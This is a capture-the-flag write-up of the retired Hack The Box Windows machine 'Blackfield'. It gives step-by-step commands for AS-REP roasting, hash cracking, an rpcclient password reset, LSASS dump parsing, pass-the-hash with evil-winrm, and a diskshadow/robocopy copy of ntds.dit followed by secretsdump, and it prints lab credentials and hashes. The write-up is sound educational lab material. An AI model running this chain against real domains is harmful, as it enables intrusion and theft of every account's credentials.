Summary
Blackfield is a Windows box of hard difficulty from Hack The Box platform that was retired at 3 October 2020 at 19:00:00 UTC. By the time I did this box it was rated as 4.9 ⭐️, which depicts its quality and the great experience it provides. The attack vectors exercised in here include SMB enumeration, credentials dumping and Backup/Restore services abuse.
Scanning and Enumeration
After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.
$ports=$(nmap -p- --min-rate=1000 -T4 blackfield.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$nmap -p$ports -T4 -Pn -A blackfield.htbThe result is a bunch of open ports, mostly related to Active Directory Domain Services:
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-05 07:31:55Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/4%Time=5F52DB24%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 7h05m46s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-05T07:34:26
|_ start_date: N/A
So, we know that the target runs LDAP, Kerberos, Samba and we’ve got a domain as well (BLACKFIELD.local0). Let’s begin our enumeration with Samba.
SMB
We can use either smbclient or smbmap to enumerate shares, the latter being more verbose and providing more information.
$smbclient -NL blackfield.htbSharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server shareSMB1 disabled -- no workgroup available
As shown in the smbmap output below, we have read access to a non-default share called profiles.
$smbmap -u guest -p '' -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: blackfield.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server shareListing the given share returns the following:
. D 0 Wed Jun 3 13:47:12 2020
.. D 0 Wed Jun 3 13:47:12 2020
AAlleni D 0 Wed Jun 3 13:47:11 2020
ABarteski D 0 Wed Jun 3 13:47:11 2020
ABekesz D 0 Wed Jun 3 13:47:11 2020
ABenzies D 0 Wed Jun 3 13:47:11 2020
ABiemiller D 0 Wed Jun 3 13:47:11 2020
AChampken D 0 Wed Jun 3 13:47:11 2020
ACheretei D 0 Wed Jun 3 13:47:11 2020
ACsonaki D 0 Wed Jun 3 13:47:11 2020
... ... ... ...
YVonebers D 0 Wed Jun 3 13:47:12 2020
YZarpentine D 0 Wed Jun 3 13:47:12 2020
ZAlatti D 0 Wed Jun 3 13:47:12 2020
ZKrenselewski D 0 Wed Jun 3 13:47:12 2020
ZMalaab D 0 Wed Jun 3 13:47:12 2020
ZMiick D 0 Wed Jun 3 13:47:12 2020
ZScozzari D 0 Wed Jun 3 13:47:12 2020
ZTimofeeff D 0 Wed Jun 3 13:47:12 2020
ZWausik D 0 Wed Jun 3 13:47:12 2020These profiles could be related to usernames in Active Directory. So, we can put these names into a text file in order to be used in the next step.
Kerberos
Having created a file called profiles.txt containing the values for the first columnn from the previous output, we can use a tool called GetNPUsers.py, which is part of Impacket. The description of the tool says all about it:
Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking.
Running the following command we will get TGTs (Ticket-Granting Tickets) in a file called tgts.txt in a format that can be read by hashcat for cracking.
$GetNPUsers.py -outputfile tgts.txt -format hashcat -usersfile profiles.txt -no-pass -dc-ip 10.10.10.192 blackfield.local/The result is a TGT hash for user support@blackfield.local.
Besides that, if we look at the command output we can see that there are other two valid user accounts (audit2020 and svc_backup).
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)Getting a Foothold
We will use hashcat to crack the hash found using RockYou wordlist:
hashcat -a 0 -m 18200 -o cracked.txt tgts.txt rockyou.txtThe -m 18200 option is for Kerberos 5, etype 23, AS-REP hash type. The cracked password is#00^BlackKnight. With this credential we have no extra permission on Samba.
RPC
In this stage, we perform a little more of enumeration, this time using rpcclient. This starts by issuing the command rpcclient -U support blackfield.htb and providing the password.
The command enumdomusers shows another user called lydericlefebvre that hadn’t showed up earlier. The command getdompwinfo returns DOMAIN_PASSWORD_COMPLEX. The fact the domain is configured to allow only complex passwords can be obtained with enum4linux as well:
$enum4linux -u support -p "#00^BlackKnight" -S -d -P -G -k support,audit2020,lydericlefebvre,svc_backup 10.10.10.192...
[+] Password Info for Domain: BLACKFIELD[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
...
From the output above, we know that besides using complex passwords, the passwords should also have at least 7 characters in length.
Other commands performed with rpcclient did not show more useful information. One special command that worked, however, guessed from the current username (support), was the command to change another user’s password.
So, we can go ahead and change password for user audit2020 with the following command:
setuserinfo2 audit2020 23 'Pr0blem?'SMB (again)
Now that we have changed the password for user audit2020, we should check its permissions on Samba shares:
$smbmap -u audit2020 -p 'Pr0blem?' -H blackfield.htb
[+] IP: blackfield.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server shareNice! We have access to forensic share. We can connect to it and see what it is inside.
$smbclient -U 'audit2020%Pr0blem?' //10.10.10.192/forensicAfter some navigating through the directories, we can see a file called lsass.zip at memory_analysis folder. It is known that is possible to dump passwords from LSASS (Local Security Authority Subsystem Service), so maybe this file contains something useful.
We can download the file to our machine with:
$smbget -U ‘audit2020%Pr0blem?’ -r smb://10.10.10.192/forensic/memory_analysis/lsass.zipWe are close to own user!
Owning User
After unzipping the downloaded file, we can use pypykatz (a Python implementation of mimikatz) to extract credentials from the dump:
$file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
$pypykatz lsa minidump lsass.DMPThe result is a NT hash for user svc_backup.
The next step is to use evilwinrm to perform a PtH (Pass-the-Hash) attack:
$evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400dOnce connected to the system, just grab the user flag: ff****************************15.
Owning System
We can start our enumeration with whoami /all and viewing information about our current user.
Although the current user belongs to Backup Operators group and has SeBackupPrivilege and SeRestorePrivilege privileges, we can’t directly access the file ntds.dit.
The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain, so our interest in put our hands on it.
The robocopy command with /b option is for us to copy a file in backup mode.
Diskshadow
In order to have access to ntds.dit we should create a shadow copy for volume C:with diskshadowutility. This way, we can copy the desired file to a temporary location and download it to our machine for analysis.
The server does not accept commands passed directly in the command line, so we should write scripts containing the desired instructions.
We can create two files to keep things organized: one for creating our shadow volume and exposing it to a temporary location, and another for cleaning things up.
The first script is as follows:
set context persistent nowriters
set metadata c:\temp\badbkp.cab
add volume c: alias badbkp
create
expose %badbkp% z:It will stores metadata at C:\temp\badbkp.cab, which we will read in the second script:
load metadata c:\temp\badbkp.cab
delete shadows volume %badbkp%
resetAssuming we have created the two scripts in a Linux machine and have named them as ds_unix.txt and ds_clean_unix.txt respectively, we should convert them so that they can be read without issues in our Windows target. We can do this very quickly:
unix2dos -n ds_unix.txt ds.txt
unix2dos -n ds_clean_unix.txt ds_clean.txtOnce the files have been uploaded to the target, we create our shadow copy and expose it to Z:with the command diskshadow.exe /s C:\temp\ds.txt.
Now we can perform the following commands to copy ntds.dit and also the system registries:
robocopy Z:\Windows\NTDS C:\temp ntds.dit /b
reg.exe save hklm\system c:\temp\SYSTEM.bakDownload files and cleanup:
diskshadow.exe /s C:\temp\ds_clean.txt
Remove-Item -path C:\temp -rDumping Secrets
From our machine, we can now dump credentials using secretsdump.py:
secretsdump.py -system SYSTEM.bak -ntds ntds.dit LOCAL
Here, we are interested in the hash for Administrator (500). PtH again and grab the root flag: 81****************************e4.
That’s it! Blackfield is awesome in many aspects. I hope you’ve enjoyed your journey!
